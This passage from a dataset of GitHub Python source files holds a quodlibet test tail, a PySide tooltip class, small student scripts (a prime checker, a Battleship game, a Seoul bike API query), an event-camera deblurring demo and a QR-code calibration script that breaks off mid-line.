self.moveart_set(target=\"\")\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_selective_pattern(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n config.set(\"albumart\", \"search_filenames\", \".jpg\")\n self.filenames = [\"cover.jpg\", \"artist.jpg\"]\n\n # should be a no-op\n count_expected = 1\n source, target = self.moveart_set(target=\"\")\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_overwrite(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n config.set(\"albumart\", \"search_filenames\", \"*.jpg\")\n self.filenames = [\"art.jpg\"]\n\n # move set\n source, target = self.moveart_set()\n # fail as target audio already exists\n self.assertRaises(Exception, self.moveart_set())\n\n # remove audio\n os.remove(os.path.join(target, \"title_1.mp3\"))\n\n # move exising target art to .orig suffix\n count_expected = 2\n self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*jpg*\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n # remove audio\n 
os.remove(os.path.join(target, \"title_1.mp3\"))\n os.remove(os.path.join(target, \"art.jpg.orig\"))\n config.set(\"rename\", \"move_art_overwrite\", True)\n\n # overwrite existing target arg\n count_expected = 1\n self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*jpg*\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_multi_source(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n config.set(\"albumart\", \"search_filenames\", \"*.jpg\")\n\n source, target = \\\n self.source_target(self.root_path, \"artist\", \"album\")\n source2, target2 = \\\n self.source_target(self.root_path, \"artist\", \"album2\")\n\n self.filenames = [\"art.jpg\"]\n self.art_set(source)\n self.filenames = [\"art2.jpg\"]\n self.art_set(source2)\n\n song_files, songs = self.song_set(source)\n song_files2, songs2 = self.song_set(source2)\n\n self.renamer.add_songs(songs + songs2)\n\n # avoid audio file clashes\n pattern = os.path.join(target, \"[] artist - \")\n self.renamer.rename(pattern, songs + songs2)\n\n # album art sets merged\n count_expected = 2\n self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n","repo_name":"quodlibet/quodlibet","sub_path":"tests/test_qltk_renamefiles.py","file_name":"test_qltk_renamefiles.py","file_ext":"py","file_size_in_byte":12633,"program_lang":"python","lang":"en","doc_type":"code","stars":1306,"dataset":"github-code","pt":"21"}
+{"seq_id":"15101466634","text":"# coding: utf-8\nfrom PySide.QtCore import QEvent, QObject, Property, QPropertyAnimation, QEasingCurve\nfrom PySide.QtGui import QCursor, QGraphicsOpacityEffect\n\nfrom pyside_tooltip.positioning.bottomTooltipPositioning import BottomTooltipPositioning\nfrom pyside_tooltip.positioning.leftTooltipPositioning import LeftTooltipPositioning\nfrom pyside_tooltip.positioning.nullTooltipPositioning import NullTooltipPositioning\nfrom pyside_tooltip.positioning.rightTooltipPositioning import RightTooltipPositioning\nfrom pyside_tooltip.positioning.topTooltipPositioning import TopTooltipPositioning\n\n__author__ = 'Andres'\n\n\nclass Tooltip(QObject):\n\t# Positioning:\n\tLEFT_POSITIONING = LeftTooltipPositioning()\n\tTOP_POSITIONING = TopTooltipPositioning()\n\tRIGHT_POSITIONING = RightTooltipPositioning()\n\tBOTTOM_POSITIONING = BottomTooltipPositioning()\n\n\tNULL_POSITIONING = NullTooltipPositioning()\n\n\t# Tiempos de fade\n\tFADE_IN_TIME = 300\n\tFADE_OUT_TIME = 500\n\n\tdef __init__(self, hoverable_widget, positionings, main_window, gap=7):\n\t\tsuper(Tooltip, self).__init__()\n\n\t\tself._current_positioning = None\n\t\tself._tooltipContainer = None\n\n\t\tself._widget = None\n\t\tself._hoverable_widget = hoverable_widget\n\t\tself._mainWindow = main_window\n\t\tself._gap = gap\n\t\tself._positionings = positionings\n\t\tself._positionings.append([Tooltip.NULL_POSITIONING, None])\n\t\tself.isHoverable = True\n\n\t\tself._hoverable_widget.installEventFilter(self)\n\n\tdef gap(self):\n\t\treturn self._gap\n\n\tdef getWidget(self):\n\t\traise NotImplementedError(\"Subclass Responsibility\")\n\n\tdef widget(self):\n\t\treturn self._widget\n\n\tdef hoveredWidget(self):\n\t\treturn self._hoverable_widget\n\n\tdef positionings(self):\n\t\treturn self._positionings\n\n\tdef close(self):\n\t\tself._tooltipContainer.close()\n\t\tself._tooltipContainer = None\n\n\tdef closeTooltip(self):\n\t\tif self._tooltipContainer is not None:\n\t\t\tself._tooltipContainer.removeEventFilter(self)\n\t\t\topacity = self._getOpacity() + 0.01\n\t\t\tself._fade(opacity, 0.0, self.FADE_OUT_TIME * opacity)\n\t\t\tself.anim.finished.connect(self.close)\n\n\tdef _closeTooltipWithoutAnimation(self):\n\t\t\"\"\"\n\t\tNo superponer explicitamente animaciones.\n\t\tSi el tooltip se cierra y detras suyo se abre otra vista, usar este metodo.\n\t\t\"\"\"\n\t\tif self._tooltipContainer is not None:\n\t\t\tself.close()\n\n\tdef setHoverability(self):\n\t\tself.isHoverable = True\n\n\tdef _handleHoveredWidgetEnterEvent(self):\n\t\tif self._tooltipContainer is None:\n\t\t\tself._widget = self.getWidget()\n\t\t\tself._current_positioning = self._getBestPossiblePositioning()\n\t\t\tself._tooltipContainer = self._current_positioning[0].showTooltip(self, self._current_positioning[1], self._mainWindow)\n\t\t\tself._tooltipContainer.installEventFilter(self)\n\t\t\tself._fade(0.0, 1.0, self.FADE_IN_TIME)\n\t\telse:\n\t\t\topacity = self._getOpacity()\n\t\t\tself._fade(opacity, 1.0, self.FADE_IN_TIME * (1 - opacity))\n\t\t\tself._tooltipContainer.installEventFilter(self)\n\n\tdef _handleHoveredWidgetLeaveEvent(self):\n\t\tif not self.isHoverable:\n\t\t\tself._closeTooltipWithoutAnimation()\n\t\telif self._tooltipContainer is not None and not self._tooltipContainerUnderMouse():\n\t\t\tself.closeTooltip()\n\n\tdef _handleTooltipLeaveEvent(self):\n\t\ttry:\n\t\t\tif not self._hoveredWidgetUnderMouse():\n\t\t\t\tself.closeTooltip()\n\t\texcept RuntimeError:\n\t\t\tself.closeTooltip()\n\n\tdef 
_getBestPossiblePositioning(self):\n\t\treturn next(positioning for positioning in self._positionings\n\t\t\t\t\tif positioning[0].isPossibleFor(self._hoverable_widget, self, self._mainWindow))\n\n\tdef _tooltipContainerUnderMouse(self):\n\t\treturn self._tooltipContainer.rect().contains(self._tooltipContainer.mapFromGlobal(QCursor.pos()))\n\n\tdef _hoveredWidgetUnderMouse(self):\n\t\treturn self._hoverable_widget.rect().contains(self._hoverable_widget.mapFromGlobal(QCursor.pos()))\n\n\tdef eventFilter(self, obj, event):\n\t\tif obj is self._hoverable_widget:\n\t\t\tif event.type() is QEvent.Enter:\n\t\t\t\tself._handleHoveredWidgetEnterEvent()\n\t\t\telif event.type() is QEvent.Leave:\n\t\t\t\tself._handleHoveredWidgetLeaveEvent()\n\t\t\t\tself.setHoverability()\n\t\telif obj is self._tooltipContainer:\n\t\t\tif event.type() is QEvent.Leave:\n\t\t\t\tself._handleTooltipLeaveEvent()\n\t\treturn False\n\n\t# Aca viene la mierda del fade\n\n\tdef _getOpacity(self):\n\t\treturn self._tooltipContainer.graphicsEffect().opacity()\n\n\tdef _setOpacity(self, opacity):\n\t\tif self._tooltipContainer is not None:\n\t\t\teffect = QGraphicsOpacityEffect(self._tooltipContainer)\n\t\t\teffect.setOpacity(opacity)\n\t\t\tself._tooltipContainer.setGraphicsEffect(effect)\n\n\t_opacity_property = Property(type(0.0), _getOpacity, _setOpacity)\n\n\tdef _fade(self, start, end, duration):\n\t\teffect = QGraphicsOpacityEffect(self)\n\t\teffect.setOpacity(start)\n\t\tself._tooltipContainer.setGraphicsEffect(effect)\n\n\t\tself.anim = QPropertyAnimation(self, \"_opacity_property\")\n\t\tself.anim.setDuration(duration)\n\t\tself.anim.setStartValue(start)\n\t\tself.anim.setEndValue(end)\n\t\tself.anim.setEasingCurve(QEasingCurve.OutQuad)\n\t\tself.anim.start()\n","repo_name":"andimarafioti/pyside-tooltip","sub_path":"pyside_tooltip/Tooltip.py","file_name":"Tooltip.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"6549563886","text":"l = list()\nprime = list()\ncomposite = list()\nn = int(input(\"Enter the number of elements: \"))\ndef isPrime(n):\n if n > 1:\n for i in range(2, n//2 + 1):\n if (n % i) == 0:\n return False\n return True\n else:\n return False\n \nfor i in range(0, n):\n ele = int(input(f\"Enter element {i+1}:\"))\n l.append(ele)\n if isPrime(ele):\n prime.append(ele)\n else:\n composite.append(ele)\nprint(\"List: \", l)\nprint(\"Prime: \", prime)\nprint(\"Composite: \", composite)\n","repo_name":"Mayon-Francis/S6_Python_Elective","sub_path":"Assignment3/02_listPrimeComposite.py","file_name":"02_listPrimeComposite.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"36689432252","text":"import numpy as np\nimport random\nimport variables as var\nimport funciones as f\nimport clases as c\nimport time\n\n# creamos dos objetos de tablero ,uno para la persona y otro para la maquina\nobjeto_persona = c.Tablero('persona', var.ancho, var.largo, var.barcos)\nobjeto_maquina = c.Tablero('maquina', var.ancho, var.largo, var.barcos)\n# el peimer turno es para la persona,y print un tablero con los barcos de la persona\n\nturno = 'persona'\nprint('Tus barcos:')\ntime.sleep(2)\nprint(objeto_persona.tablero_barcos)\n#ahora empiza el juego\nwhile True:\n # se pinta de quien es el turno\n print('Turno de: ' + turno)\n #si el turno es de la persona ,pintamos el tablero de la maquina,y pedimos la entrada de coordenadas\n if turno == 'persona':\n objeto_maquina.pintar()\n coordinadas_entrada = str(input(\"¿Dónde quieres disparar? Ejemplo: 1,1: \")).replace(\".\",\",\").split(',') #进入坐标返回的是一个列表\n \n # verifica si las coordenadas supera los limites o no, en caso de superar solicitamos nuevas coordenadas\n while int(coordinadas_entrada[0]) not in range(var.ancho) or int(coordinadas_entrada[1]) not in range(var.largo):\n print('Coordinada es invalida, introduce una nueva coordenada')\n coordinadas_entrada = str(input(\"¿Dónde quieres disparar? Ejemplo: 1,1: \")).replace(\".\",\",\").split(',')\n \n # verifica si esas coordenas hubo disparo o no, en caso de que si, solicitamos nuevas coordenadas. \n while objeto_maquina.tiene_disparo(int(coordinadas_entrada[0]), int(coordinadas_entrada[1])): \n print('Ya has disparado en esa coordenada, introduce una nueva coordenada')\n coordinadas_entrada = str(input(\"¿Dónde quieres disparar? Ejemplo: 1,1: \")).replace(\".\",\",\").split(',')\n \n # esta parte cuando se ha disparado al agua, retorna false y pasa el turno a la maquina \n if objeto_maquina.disparar(int(coordinadas_entrada[0]), int(coordinadas_entrada[1])) == False:\n turno = 'maquina'\n # se pinta finalmente el tablero de la maquina\n objeto_maquina.pintar()\n time.sleep(2)\n\n else: # en caso de que sea el turno de la maquina\n objeto_persona.pintar()# se pinta el tablero de la persona,y generar coordenadas aleatorias\n x = random.randint(0, var.ancho -1)\n y = random.randint(0, var.largo-1)\n\n # return self.tablero_disparos[x][y] == 'X' or self.tablero_disparos[x][y] == '-'\n # este while generará un nueva coordenada mientras la coordenada aleatoria ya tenga un disparo\n while objeto_persona.tiene_disparo(x, y):\n x = random.randint(0, var.ancho -1)\n y = random.randint(0, var.largo -1)\n #se dispara a la coordenada generada si devuelve false parasamos el turno a la persona\n if objeto_persona.disparar(x, y) == False:\n turno = 'persona'\n #se vuelve a pintar el tablero de disparos de la persona \n objeto_persona.pintar()\n\n # una vez if acaba, se comprueba la vida de la persona y la maquina ,sse comprueba la vida si alguno llega\n # a 0 ,y el otro gana y se rompe el bucle ,y se pinta fin\n if objeto_persona.vidas == 0:\n print('Ganador: maquina')\n break\n if objeto_maquina.vidas == 0:\n print('Ganador: persona')\n break\n\nprint('FIN')\n","repo_name":"qinghua03/hundir_la-_flota","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"13483560754","text":"import queue\nimport numpy as np\nimport cv2\nimport threading\nfrom copy import deepcopy\n\n# dv_processing@https://dv-processing.inivation.com/rel_1.7/installation.html\nimport dv_processing as dv\nimport argparse\nimport time\nimport datetime\nfrom PIL import Image\nfrom inference import davis346_inference\nfrom event_utils import hot_pixel_detect\nfrom DAVIS_event_abnormal_detect import Event_package_loss\n\nfrom model import EFNet\nfrom model import load_network\n\n\n## 采集DAVIS的子线程\nthread_lock = threading.Lock()\nthread_exit = False\ndeblur_waiting_flag = True\nexposure_time = 40 ##ms\nmodel = None\n\n\nclass DAVIS(threading.Thread):\n def __init__(self, img_height, img_width, cam):\n super(DAVIS, self).__init__()\n self.img_height = img_height\n self.img_width = img_width\n self.cam = cam\n # frame是一个常变的变量,deblur线程不会直接访问它。主线程会访问它,以显示DAVIS实时采集到的APS帧\n self.frame = np.zeros((img_height, img_width), dtype=np.uint8)\n self.event = None\n self.frame_timestamp = 0\n self.last_frame = np.zeros((img_height, img_width), dtype=np.uint8)\n self.last_frame_timestamp = 0\n # event_list用于存储一个较长时间段的事件序列\n self.event_list = None\n # deblur_events是event_list经过挑选后,符合送入deblur处理线程的事件序列\n self.deblur_events = None\n self.frame_enable = True\n self.exposure_start = 0\n self.exposure_end = 0\n self.debug_ts = 0\n\n self.acquire_flag = True\n\n\n def get_frame(self):\n return deepcopy(self.frame)\n\n def get_event(self):\n if self.event is not None:\n return self.event.numpy()\n\n def get_last_frame_timestamp(self):\n return self.last_frame_timestamp\n\n def get_last_frame(self):\n return deepcopy(self.last_frame)\n\n def get_event_list(self):\n return deepcopy(self.event_list)\n\n\n\n def get_deblur_events(self):\n if self.deblur_events is not None:\n return self.deblur_events\n else:\n return None\n\n def run(self):\n global thread_exit\n global deblur_waiting_flag\n while (not thread_exit and self.cam.isRunning()):\n # frame = cv2.resize(frame, (self.img_width, self.img_height))\n # 从设备buffer读取frame及event\n frame = self.cam.getNextFrame()\n\n events = self.cam.getNextEventBatch()\n\n thread_lock.acquire()\n if frame is not None:\n self.frame = frame.image\n self.frame_timestamp = frame.timestamp\n # time.sleep(1)\n\n if events is not None:\n self.event = events\n # event_bag=events.numpy().tolist()\n\n # deblur 用不到external trigger\n # if triggers is not None:\n # # self.trigger_list = triggers[0:-1]\n # #\n # # print(f\"Received imu data within time range [{triggers[0].timestamp}; {triggers[-1].timestamp}]\")\n # for i,trigger in enumerate(triggers):\n # # print(trigger.timestamp)\n # if trigger.type.name == 'APS_EXPOSURE_START':\n # self.exposure_start = trigger.timestamp\n # elif trigger.type.name == 'APS_EXPOSURE_END':\n # self.exposure_end = trigger.timestamp\n # # print(self.exposure_end-self.exposure_start)\n\n\n # 如果deblur线程空闲,\n if deblur_waiting_flag and (events is not None) and (frame is not None):\n # 将本次采集到的APS帧放入last_frame中\n if self.frame_enable:\n self.last_frame_timestamp = self.frame_timestamp\n self.last_frame = self.frame\n self.frame_enable = False\n\n\n if self.event_list is None:\n self.event_list = np.array([events.numpy().tolist()]).squeeze()\n else:\n input_events = np.array([events.numpy().tolist()]).squeeze()\n\n if self.debug_ts == 0:\n self.debug_ts = input_events[-1,0]\n else:\n #TODO :出现报错时候,把event_list清空\n # if input_events[0, 0] - self.debug_ts > 20*exposure_time*1e3:\n # print('lss')\n # # self.event_list = None\n # # self.deblur_events 
= None\n # self.frame_enable = True\n # # time.sleep(0.0001)\n # thread_lock.release()\n # continue\n\n self.debug_ts = input_events[-1,0]\n self.event_list = np.append(self.event_list, input_events, axis=0)\n #防止event_list中事件过多导致内存泄漏\n if self.event_list.shape[0] > 330e3*10:\n print('clear')\n self.event_list = self.event_list[-int(330e3*5):,:]\n # 如果当前存储的event_list中开始��件的时间戳落后于当前存储的APS帧图像的时间戳,说明事件曝光时间内的事件不完整,丢弃这一帧,事件依然保留\n # 6.1添加:如果经过20个曝光时间,last_frame依然没有推理时,重新采一张frame存储下来(跟上实时显示的效果)\n if self.last_frame_timestamp < self.event_list[0, 0] or self.frame_timestamp-self.last_frame_timestamp > exposure_time*1e3*20:\n # self.event_list = None #event_list不清空\n self.frame_enable = True #即在下一次进入该线程时把新获取到的一帧APS存储下来\n elif self.last_frame_timestamp + exposure_time * 1000 < self.event_list[-1, 0]:\n # 说明event_list已经包含last_frame曝光时间内的所有事件了\n # print('deblur ready')\n # start=time.time()\n\n # 把event_list里曝光时间内的事件挑出来\n low_index = np.argmin(np.abs(self.event_list[:, 0].squeeze() - self.last_frame_timestamp))\n high_index = np.argmin(\n np.abs(self.event_list[:, 0].squeeze() - self.last_frame_timestamp - exposure_time * 1000))\n self.deblur_events = self.event_list[low_index:high_index, :].squeeze()\n\n # deblur_waiting_flag = False指的是deblur线程可以开始进行deblur了\n deblur_waiting_flag = False\n self.event_list = self.event_list[high_index:, :].squeeze()\n # 可以将接下来的APS流中的帧存储下来了\n self.frame_enable = True\n # end = time.time()\n # print((end-start)*1000)\n thread_lock.release()\n\n\n# 处理画面的子线程\nclass RenderFrame(threading.Thread):\n def __init__(self, thread_name, raw_thread, img_height, img_width):\n threading.Thread.__init__(self, name=thread_name)\n self.raw_thread = raw_thread\n self.input_frame = np.zeros((img_height, img_width), dtype='uint8')\n self.event_frame = np.zeros((img_height, img_width, 3), dtype='float')\n self.deblur_frame = np.zeros((img_height, img_width), dtype='uint8')\n self.input_frame_2 = np.zeros((img_height, img_width, 3), dtype='uint8')\n self.event_frame_2 = np.zeros((img_height, img_width, 3), dtype='float')\n self.hot_pixel_enum_list = np.zeros((260, 346),dtype='uint8')\n def get_input_frame(self):\n return deepcopy(self.input_frame)\n\n def get_input_frame_2(self):\n return deepcopy(self.input_frame_2)\n\n def get_deblur_frame(self):\n return deepcopy(self.deblur_frame)\n\n def get_event_frame(self):\n # self.event_frame = self.event_frame/np.max(self.event_frame)*255\n\n # return_event_frame = return_event_frame/np.max(return_event_frame)*255\n return deepcopy(self.event_frame)\n\n def get_event_frame_2(self):\n # self.event_frame = self.event_frame/np.max(self.event_frame)*255\n\n # return_event_frame = return_event_frame/np.max(return_event_frame)*255\n return deepcopy(self.event_frame_2)\n\n def run(self) -> None:\n global deblur_waiting_flag\n global model\n while (not thread_exit):\n thread_lock.acquire()\n frame = self.raw_thread.get_last_frame()\n last_timestamp = self.raw_thread.get_last_frame_timestamp()\n deblur_events = self.raw_thread.get_deblur_events()\n thread_lock.release()\n # deblur事件还不够\n if (deblur_events is None) or (deblur_events.size == 0):\n deblur_waiting_flag = True\n continue\n # 检测是否丢包,或者运动幅度不够大,没有足够的事件数量\n if Event_package_loss(deblur_events, exposure_time) or deblur_events.shape[0] < 8000:\n # event_list = self.raw_thread.get_event_list()\n deblur_waiting_flag = True\n continue\n # 采集线程已经采集到足够deblur的事件以及对应的APS帧了\n if not deblur_waiting_flag:\n # print(deblur_events.size)\n deblur_waiting_flag = True\n self.input_frame = frame\n if 
len(deblur_events.shape) > 1:\n self.event_frame = np.zeros(self.event_frame.shape, dtype='float')\n else:\n deblur_waiting_flag = True\n continue\n\n # # 生成hot_pixel_detect使用的事件帧\n # for i in range(deblur_events.shape[0]):\n # if deblur_events[i, 3] == 1:\n # self.event_frame[deblur_events[i, 2], deblur_events[i, 1], 2] = self.event_frame[\n # deblur_events[i, 2],\n # deblur_events[\n # i, 1], 2] + 1\n # else:\n # self.event_frame[deblur_events[i, 2], deblur_events[i, 1], 0] = self.event_frame[\n # deblur_events[i, 2],\n # deblur_events[\n # i, 1], 0] + 1\n # hot_pixel_list = hot_pixel_detect(self.event_frame[:, :, 2].squeeze(),\n # self.event_frame[:, :, 0].squeeze(), 4)\n # print(hot_pixel_list)\n\n\n\n # 去除hot pixel\n\n # 其实对于某个设备,每个设定bias,hot pixel应该是固定的,在默认阈值下,hot pixel 应该为\n # [[ 61 161]\n # [136 197]\n # [207 188]\n # [237 257]]\n #\n # 如果从可视化事件帧里发现事件帧不对,可能是hot pixel 变了,这时候再uncomment上面的hot_pixel_detect\n hot_pixel_list = np.array([[61, 161], [136, 197], [207, 188], [237, 257]])\n print(f'Event count before hot pixel removal:{deblur_events.shape[0]}')\n\n for i in range(hot_pixel_list.shape[0]):\n loc = np.where(\n (deblur_events[:, 2] == hot_pixel_list[i, 0]) & (deblur_events[:, 1] == hot_pixel_list[i, 1]))\n deblur_events = np.delete(deblur_events, loc, axis=0)\n\n\n\n\n if len(deblur_events.shape) > 1:\n self.event_frame = np.zeros(self.event_frame.shape, dtype='float')\n for i in range(deblur_events.shape[0]):\n if deblur_events[i, 3] == 1:\n self.event_frame[deblur_events[i, 2], deblur_events[i, 1], 2] = self.event_frame[\n deblur_events[i, 2],\n deblur_events[\n i, 1], 2] + 1\n else:\n self.event_frame[deblur_events[i, 2], deblur_events[i, 1], 0] = self.event_frame[\n deblur_events[i, 2],\n deblur_events[\n i, 1], 0] + 1\n\n # for i in range(hot_pixel_list.shape[0]):\n # loc = np.where(\n # (deblur_events[:, 2] == hot_pixel_list[i, 0]) & (deblur_events[:, 1] == hot_pixel_list[i, 1]))\n # deblur_events = np.delete(deblur_events, loc, axis=0)\n\n print(f'Event count after hot pixel removal:{deblur_events.shape[0]}')\n cv2.normalize(self.event_frame, self.event_frame, 0, 1, cv2.NORM_MINMAX)\n self.event_frame = cv2.putText(self.event_frame, 'event num: %d' % deblur_events.shape[0], [0, 60],\n cv2.FONT_HERSHEY_SIMPLEX, 1, (1, 1, 1), 3)\n\n # 送入推理\n out_img = davis346_inference(frame, deblur_events, last_timestamp,model)\n self.deblur_frame = out_img\n self.event_frame_2 = self.event_frame\n self.input_frame_2[:, :, 0] = self.input_frame\n self.input_frame_2[:, :, 1] = self.input_frame\n self.input_frame_2[:, :, 2] = self.input_frame\n\n # time.sleep(0.5)\n # self.render_data.put(deblured_img)\n\n\ndef main():\n global thread_exit\n global deblur_waiting_flag\n global exposure_time\n global model\n parser = argparse.ArgumentParser(description='Show a preview of an iniVation event camera input.')\n args = parser.parse_args()\n cv2.namedWindow(\"DAVIS Frame Output\", cv2.WINDOW_GUI_NORMAL)\n cv2.namedWindow('Input Frame', cv2.WINDOW_GUI_NORMAL)\n cv2.namedWindow('Deblur Frame', cv2.WINDOW_GUI_NORMAL)\n cv2.namedWindow('Event Frame', cv2.WINDOW_GUI_NORMAL)\n # Open the camera\n camera = dv.io.CameraCapture()\n camera.setDavisExposureDuration(datetime.timedelta(milliseconds=exposure_time))\n camera.setDavisFrameInterval(datetime.timedelta(milliseconds=int(exposure_time)))\n\n # camera.setDVSGlobalHold(False) # no use\n camera.deviceConfigSet(-3,1,50000) #设定发包间隔,默认为10000微秒。改为50,000微妙后显示帧率降低,但是减少出��event buffer overflow的概率\n # 
可能的修改阈值方法@https://gitlab.com/inivation/inivation-docs/-/blob/master/Advanced%20configurations/User_guide_-_Biasing.md\n # camera.deviceConfigSet(5, 12, 16420)\n # camera.deviceConfigSet(5, 11, 24573)\n print(camera.deviceConfigGet(-3, 1))\n # test = camera.caerDeviceConfigGet(camera.deviceConfigGet(5, 12))\n # 加载模型\n\n # weight_path = './net_g_latest_REBlur.pth'\n weight_path = './net_g_latest_GoPro.pth'\n # weight_path = './net_g_latest.pth'\n # weight_path = './net_g_gray.pth'\n model = EFNet().cuda()\n # 测试跑通不需要权重\n # model.load_state_dict(torch.load(weight_path))\n # TODO load_network 放到main 线程(出现过bug)\n model = load_network(model, weight_path, True, param_key='params')\n\n model.eval()\n\n # print(camera.isRunning())\n img_height = 260\n img_width = 346\n thread_davis = DAVIS(img_height, img_width, camera)\n thread_davis.start()\n deblur = RenderFrame(\"RenderFrame\", thread_davis, img_height, img_width)\n deblur.start() # 开始线程\n\n # 在主线程处理渲染完成的画面\n '''\n 由于 OpenCV 的限制,无法在子线程中使用 nameWindow 或者 imshow 等方法\n 只能新建一个多线程列队将渲染完成的信息加入到列队,然后再在主线程中展示出来\n '''\n while not thread_exit:\n # start_time = time.time()\n thread_exit = not camera.isRunning()\n thread_lock.acquire()\n frame = thread_davis.get_frame()\n\n deblur_frame = deblur.get_deblur_frame()\n render_frame = deblur.get_input_frame_2()\n event_frame = deblur.get_event_frame_2()\n thread_lock.release()\n cv2.imshow('DAVIS Frame Output', frame)\n\n # 如果获取的帧不为空\n cv2.imshow('Input Frame', render_frame)\n cv2.imshow('Event Frame', event_frame)\n cv2.imshow('Deblur Frame', deblur_frame)\n if cv2.waitKey(1) == 27:\n thread_exit = True\n cv2.destroyAllWindows()\n # end_time = time.time()\n # print(\"FPS: \", 1 / (end_time - start_time))\n # break\n # DAVIS346采集线程\n thread_davis.join()\n # Deblur 处理线程\n deblur.join()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Reza-Zhu/DAVIS346_deblur","sub_path":"multi_show(start).py","file_name":"multi_show(start).py","file_ext":"py","file_size_in_byte":17614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"32828526283","text":"import requests\n\nurl = \"http://openapi.seoul.go.kr:8088/515261424a696d743732716e434c62/json/bikeList/1/1000/\"\nres = requests.get(url)\ndata = res.json()\n# print(data)\nRealTime = data['rentBikeStatus']['row']\n# print(RealTime)\nfor i in RealTime:\n print(i['stationName'])\n print('거치대개수:', i['rackTotCnt'],'개,', '자전거주차총건수:', i['parkingBikeTotCnt'], '개,', '거치율:', i['shared'], '%')\n print(\"위도: \", i['stationLatitude'] , ',', \"경도: \", i['stationLongitude'])\n print()\n","repo_name":"cheonseohee/proj_django","sub_path":"theme/templatetags/bicycle_seoul.py","file_name":"bicycle_seoul.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"44710713751","text":"from turtle import circle\nimport cv2\nimport pyzbar.pyzbar as pyzbar\nimport numpy as np\nimport sys\n\nW_REF = 0.0\nH_REF = 0.0\n\ndstPoints = 15*np.array([np.array((6.0,6.0)),\n np.array((11.6+6.0,6.0)),\n np.array((0.0+6.0,18.4+6.0)),\n np.array((11.6+6.0,18.4+6.0)),])\n\ndef display(im, decodedObjects, message=\"Results\"): \n # Loop over all decoded objects\n\n for decodedObject in decodedObjects:\n\n points = decodedObject.polygon\n # If the points do not form a quad, find convex hull\n if len(points) > 4:\n hull = cv2.convexHull(\n np.array([point for point in points], dtype=np.float32)\n )\n hull = list(map(tuple, np.squeeze(hull)))\n\n else:\n hull = points\n\n # Number of points in the convex hull\n n = len(hull)\n # Draw the convext hull\n for j in range(0, n):\n cv2.line(im, hull[j], hull[(j + 1) % n], (255, 0, 0), 2)\n\n # Display results\n cv2.imshow(message, im)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\nclass QRDecoder:\n def __init__(self):\n self.cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n self.cap.set(3,640)\n self.cap.set(4,480)\n self.h_corr = 1.0\n self.w_corr = 1.0\n\n def calibration(self):\n decodedObjects = []\n\n while len(decodedObjects) != 4:\n _, img = self.cap.read()\n decodedObjects = pyzbar.decode(img)\n if cv2.waitKey(1) == ord(\"q\"):\n cv2.waitKey(1)\n cv2.destroyAllWindows()\n sys.exit()\n \n display(img, decodedObjects, message=\"Detected beacons\")\n \n centers = {}\n for obj in decodedObjects:\n data = obj.data\n points = obj.polygon\n points = np.array([point for point in points])\n center = np.sum(points, axis=0) / 4\n center = center.astype(int)\n centers[data] = center\n cv2.circle(img, tuple(center), 1, (0, 0, 255), 5)\n\n cv2.imshow(\"\", img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n top_left = centers[b\"top_left_ref\"]\n print(top_left)\n top_right = centers[b\"top_right_ref\"]\n bottom_left = centers[b\"http://bottom_left_ref\"]\n bottom_right = centers[b\"bottom_right_ref\"]\n srcPoints = np.array([top_left, top_right, bottom_left, bottom_right])\n print(srcPoints)\n print(dstPoints)\n H, _ = cv2.findHomography(srcPoints, dstPoints)\n img_warp = cv2.warpPerspective(img, H, (img.shape[1], img.shape[0]))\n cv2.imshow(\"warp\", img_warp)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n exit(H)\n h_obs = bottom_left[0] - top_left[0]\n w_obs = top_left[1] - top_left[1]\n\n self.h_corr = 1 - (h_obs / H_REF)\n self.w_corr = 1 - (w_obs / W_REF)\n\n def decode(self, im):\n decodedObjects = pyzbar.decode(im)\n\n if not decodedObjects:\n return None, None\n\n for obj in decodedObjects:\n if obj.data == \"robot\":\n robot = obj\n break\n\n left, top, width, height = robot.rect\n\n top_left = np.array([top, left])\n top_right = np.array([top, left + width])\n bottom_left = np.array([top - height, left])\n bottom_right = np.array([top - height, left + width])\n\n center = (top_left + top_right + bottom_left + bottom_right) / 4\n center = [center[0] * self.h_corr, center[1] * self.w_corr]\n\n return decodedObjects, center\n\n def tracking(self):\n while True:\n _, img = self.cap.read()\n decodedObjects, center = self.decode(img)\n print(\"CENTER : \", center)\n if decodedObjects:\n display(img, decodedObjects)\n if cv2.waitKey(1) == ord(\"q\"):\n cv2.waitKey(1)\n cv2.destroyAllWindows()\n\n sys.exit()\n\n\ndef main():\n decoder = QRDecoder()\n decoder.calibration()\n key = input(\"Once Cozmo is set, press any litteral key to continue.\")\n if key:\n decoder.tracking()\n cv2.waitKey(1)\n cv2.destroyAllWindows()\n\n\nif 
